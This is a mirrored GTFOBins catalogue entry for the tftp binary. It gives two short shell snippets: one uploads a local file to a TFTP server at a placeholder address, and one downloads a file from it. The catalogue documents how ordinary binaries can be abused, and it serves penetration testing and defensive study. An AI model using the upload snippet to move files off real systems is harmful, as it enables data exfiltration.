mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
15 lines
315 B
Markdown
15 lines
315 B
Markdown
|
---
|
||
|
functions:
|
||
|
upload:
|
||
|
- description: Send local file to a TFTP server.
|
||
|
code: |
|
||
|
RHOST=10.0.0.1
|
||
|
tftp $RHOST
|
||
|
put file_to_send
|
||
|
download:
|
||
|
- description: Fetch a remote file from a TFTP server.
|
||
|
code: |
|
||
|
RHOST=10.0.0.1
|
||
|
tftp $RHOST
|
||
|
get file_to_get
|
||
|
---
|